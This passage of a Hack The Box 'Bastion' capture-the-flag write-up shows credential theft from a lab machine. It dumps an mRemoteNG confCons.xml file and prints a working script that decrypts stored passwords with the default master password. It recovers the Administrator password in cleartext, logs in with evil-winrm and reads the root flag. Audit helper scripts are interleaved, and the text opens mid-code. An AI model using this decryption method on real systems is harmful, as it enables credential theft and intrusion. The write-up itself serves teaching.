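<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
  EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
  FullFileEncryption="false" Protected="c2FtcGxlLXByb3RlY3RlZC1ibG9i" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="c2FtcGxlLWNpcGhlcnRleHQ=" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="Lab" Type="Container" Username="" Password="">
    <Node Name="web01" Type="Connection" Username="svc_web" Domain="LAB"
          Password="" Hostname="10.0.0.5" Protocol="SSH2" Port="22" />
  </Node>
</mrng:Connections>
"""

SETTING_KEYS = ("EncryptionEngine", "BlockCipherMode", "KdfIterations",
                "FullFileEncryption", "ConfVersion")


def load_connections(xml_text):
    """Return (settings, nodes): root encryption attributes and every Connection node."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    settings = {k: root.get(k) for k in SETTING_KEYS}
    nodes = [
        {"name": n.get("Name"), "user": n.get("Username", ""), "domain": n.get("Domain", ""),
         "host": n.get("Hostname", ""), "protocol": n.get("Protocol", ""),
         "has_password": bool(n.get("Password"))}
        # <Node> elements carry no namespace; iter() also descends into containers.
        for n in root.iter("Node") if n.get("Type") == "Connection"
    ]
    return settings, nodes


def review(settings, nodes):
    """Findings a defender would raise about this file."""
    findings = []
    if settings.get("FullFileEncryption") != "true":
        findings.append("FullFileEncryption is off: host names, usernames and node layout are plaintext")
    findings.append(f"password material is protected by {settings.get('EncryptionEngine')}-"
                    f"{settings.get('BlockCipherMode')} with {settings.get('KdfIterations')} KDF "
                    "iterations; its strength is only that of the master password")
    for n in nodes:
        if not n["has_password"]:
            continue
        who = f"{n['domain']}\\{n['user']}" if n["domain"] else n["user"]
        findings.append(f"stored password for {who} on {n['host']} ({n['protocol']}), node '{n['name']}'")
    return findings


if __name__ == "__main__":
    # Usage: python3 this.py [path\to\confCons.xml]; without a path the sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_CONFCONS
    settings, nodes = load_connections(text)
    print(f"{len(nodes)} connection(s), {sum(n['has_password'] for n in nodes)} with a stored password")
    for line in review(settings, nodes):
        print(" -", line)
```

On the sample this reports one stored credential (Administrator on 127.0.0.1 over RDP) and the unencrypted file layout; pointed at the real confCons.xml and its timestamped .backup copies it gives the same inventory for each file.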
Let's go to the absolute path "C:\Users\L4mpje\AppData\Roaming\mRemoteNG" and list its contents:
l4mpje@BASTION C:\>cd "C:\Users\L4mpje\AppData\Roaming\mRemoteNG"                                                               
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                                    
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 1B7D-E692                                                                                              
 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                                         
22-02-2019  14:03    <DIR>          .                                                                                           
22-02-2019  14:03    <DIR>          ..                                                                                          
22-02-2019  14:03             6.316 confCons.xml                                                                                
22-02-2019  14:02             6.194 confCons.xml.20190222-1402277353.backup                                                     
22-02-2019  14:02             6.206 confCons.xml.20190222-1402339071.backup                                                     
22-02-2019  14:02             6.218 confCons.xml.20190222-1402379227.backup                                                     
22-02-2019  14:02             6.231 confCons.xml.20190222-1403070644.backup                                                     
22-02-2019  14:03             6.319 confCons.xml.20190222-1403100488.backup                                                     
22-02-2019  14:03             6.318 confCons.xml.20190222-1403220026.backup                                                     
22-02-2019  14:03             6.315 confCons.xml.20190222-1403261268.backup                                                     
22-02-2019  14:03             6.316 confCons.xml.20190222-1403272831.backup                                                     
22-02-2019  14:03             6.315 confCons.xml.20190222-1403433299.backup                                                     
22-02-2019  14:03             6.316 confCons.xml.20190222-1403486580.backup                                                     
22-02-2019  14:03                51 extApps.xml                                                                                 
22-02-2019  14:03             5.217 mRemoteNG.log                                                                               
22-02-2019  14:03             2.245 pnlLayout.xml                                                                               
22-02-2019  14:01    <DIR>          Themes                                                                                      
              14 File(s)         76.577 bytes                                                                                   
               3 Dir(s)   4.824.477.696 bytes free                                                                              
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>

There is a file named "confCons.xml", the XML file that stores the encrypted passwords:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleS
ession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="fa
lse" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoad
BalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" Inheri
tExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" 
InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNC
Colors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHo
stname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false
" InheritRDGatewayDomain="false" />                                                                                             
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128"
 Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostnam
e="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rendering
Engine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="f
alse" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayTh
emes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" Redire
ctPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKey
s="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncodin
g="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPasswor
d="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname=""
 RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false
" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFon
tSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" Inheri
tPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" Inhe
ritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRe
directSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSessio
n="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" 
InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalan
ceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtA
pp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" Inher
itVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColor
s="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostnam
e="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" Inh
eritRDGatewayDomain="false" />                                                                                                  
</mrng:Connections>                                                                                                             
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>
We can see the credentials of the "Administrator" user:
Username="Administrator" Domain="" 
Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1"
To decrypt this encrypted password, we will use the following GitHub project (haseebT/mRemoteNG-Decrypt):
#!/usr/bin/env python3
import hashlib
import base64
from Cryptodome.Cipher import AES
import argparse
import sys


def main():
  parser = argparse.ArgumentParser(description="Decrypt mRemoteNG passwords.")
  group = parser.add_mutually_exclusive_group()
  group.add_argument("-f", "--file", help="name of file containing mRemoteNG password")
  group.add_argument("-s", "--string", help="base64 string of mRemoteNG password")
  # "mR3m" is mRemoteNG's built-in default master password
  parser.add_argument("-p", "--password", help="Custom password", default="mR3m")
  if len(sys.argv) < 2:
    parser.print_help(sys.stderr)
    sys.exit(1)
  args = parser.parse_args()
  encrypted_data = ""
  if args.file is not None:
    with open(args.file) as f:
      encrypted_data = f.read()
      encrypted_data = encrypted_data.strip()
      encrypted_data = base64.b64decode(encrypted_data)
  elif args.string is not None:
    encrypted_data = args.string
    encrypted_data = base64.b64decode(encrypted_data)
  else:
    print("Please use either the file (-f, --file) or string (-s, --string) flag")
    sys.exit(1)
  # Blob layout: 16-byte salt | 16-byte GCM nonce | ciphertext | 16-byte GCM tag
  salt = encrypted_data[:16]
  associated_data = encrypted_data[:16]  # the salt doubles as GCM associated data
  nonce = encrypted_data[16:32]
  ciphertext = encrypted_data[32:-16]
  tag = encrypted_data[-16:]
  # AES key = PBKDF2-HMAC-SHA1(master password, salt, 1000 iterations, 32 bytes)
  key = hashlib.pbkdf2_hmac("sha1", args.password.encode(), salt, 1000, dklen=32)
  cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
  cipher.update(associated_data)
  # raises ValueError if the tag does not verify (wrong master password)
  plaintext = cipher.decrypt_and_verify(ciphertext, tag)
  print("Password: {}".format(plaintext.decode("utf-8")))


if __name__ == "__main__":
  main()
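The script above hardcodes the 16-byte salt/nonce/tag layout and 1000 PBKDF2 iterations. As an added example, not part of this write-up or of the haseebT/mRemoteNG-Decrypt project, the following stdlib-only parser reads KdfIterations, EncryptionEngine and BlockCipherMode from the confCons.xml root instead, splits every connection's Password blob into its components, and, only when pycryptodome (the Cryptodome package) is installed, checks whether a blob verifies under the default master password "mR3m". The embedded XML is a constructed, trimmed copy of the file dumped above; SAMPLE_XML, parse_connections and decrypt_entry are names chosen here.

```python
#!/usr/bin/env python3
"""Audit helper for mRemoteNG confCons.xml (added example, not mRemoteNG code)."""
import base64
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample: the two <Node> entries from the write-up with the
# display/inherit attributes stripped; Password values are the ones printed
# by `type confCons.xml` above.
SAMPLE_XML = b"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
 Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
 FullFileEncryption="false" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
   Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
   Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Domain=""
   Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
   Hostname="192.168.1.75" Protocol="RDP" Port="3389" />
</mrng:Connections>
"""

DEFAULT_MASTER_PASSWORD = "mR3m"  # mRemoteNG's built-in default
SALT_LEN = NONCE_LEN = TAG_LEN = 16


def split_blob(b64_blob):
    """Decode a Password attribute into salt || nonce || ciphertext || tag.

    Same layout the decrypt script uses; the salt doubles as GCM associated data.
    """
    raw = base64.b64decode(b64_blob)
    if len(raw) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short to hold salt, nonce and tag")
    return {
        "salt": raw[:SALT_LEN],
        "nonce": raw[SALT_LEN:SALT_LEN + NONCE_LEN],
        "ciphertext": raw[SALT_LEN + NONCE_LEN:-TAG_LEN],
        "tag": raw[-TAG_LEN:],
    }


def derive_key(master_password, salt, iterations):
    """PBKDF2-HMAC-SHA1 with a 32-byte output, as mRemoteNG and the script use."""
    return hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"),
                               salt, iterations, dklen=32)


def parse_connections(xml_bytes):
    """Return one dict per <Node Type="Connection">, with the blob already split."""
    root = ET.fromstring(xml_bytes)
    settings = {
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations", "1000")),
    }
    entries = []
    for node in root.iter("Node"):  # <Node> carries no namespace prefix
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        entry = {"name": node.get("Name"), "username": node.get("Username"),
                 "hostname": node.get("Hostname"), **settings}
        entry.update(split_blob(node.get("Password")))
        entries.append(entry)
    return entries


def decrypt_entry(entry, master_password=DEFAULT_MASTER_PASSWORD):
    """Plaintext if the GCM tag verifies under master_password, else None.

    Needs pycryptodome; imported lazily so parsing works without it. A blob that
    verifies under the default "mR3m" is protected by nothing but the app default.
    """
    from Cryptodome.Cipher import AES
    key = derive_key(master_password, entry["salt"], entry["kdf_iterations"])
    cipher = AES.new(key, AES.MODE_GCM, nonce=entry["nonce"])
    cipher.update(entry["salt"])
    try:
        return cipher.decrypt_and_verify(entry["ciphertext"], entry["tag"]).decode("utf-8")
    except ValueError:  # tag mismatch: wrong master password or corrupted blob
        return None


if __name__ == "__main__":
    for e in parse_connections(SAMPLE_XML):
        print(f'{e["name"]}: {e["username"]}@{e["hostname"]} '
              f'{e["engine"]}-{e["mode"]} pbkdf2={e["kdf_iterations"]} '
              f'ciphertext={len(e["ciphertext"])} bytes')
        try:
            print("  verifies under default master password:", decrypt_entry(e) is not None)
        except ImportError:
            print("  (install pycryptodome to test the default master password)")
```

Run as-is it lists every entry with its ciphertext length, which equals the stored password length because GCM does not pad (16 bytes for the Administrator entry, matching the 16-character result the write-up obtains). From a defensive standpoint the finding that matters is a blob that verifies under "mR3m": the file is then protected only by the application default, and the fix is to set a custom master password in mRemoteNG; 1000 iterations of PBKDF2-SHA1 is also low by current standards, so the KdfIterations value the parser reports is worth checking too.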
We download it from GitHub with "wget":
❯ wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
--2025-03-09 06:08:26--  https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1535 (1.5K) [text/plain]
Saving to: ‘mremoteng_decrypt.py’
mremoteng_decrypt.py                          100%[===============================================================================================>]   1.50K  --.-KB/s    in 0s      
2025-03-09 06:08:26 (11.0 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]
And we run it with python3, since the script is written in Python, passing it the -s parameter with the encrypted password:
❯ python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
User: Administrator
Password: thXLHM96BeKL0ER2
Now we connect with "evil-winrm":
❯ evil-winrm -i 10.10.10.134 -u 'Administrator' -p 'thXLHM96BeKL0ER2'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
3.2 Obtaining the root flag
The root flag is in "C:\Users\Administrator\Desktop\root.txt":
*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:\Users\Administrator\Desktop\root.txt"
0dbe73d36c81a351bc5eab82bed1ac03
*Evil-WinRM* PS C:\Users\Administrator\Documents>
With this, we conclude the "Bastion" machine from Hack The Box.
I hope this write-up has been helpful to you :)
If you had any difficulty solving it, don't forget to contact me on my social networks.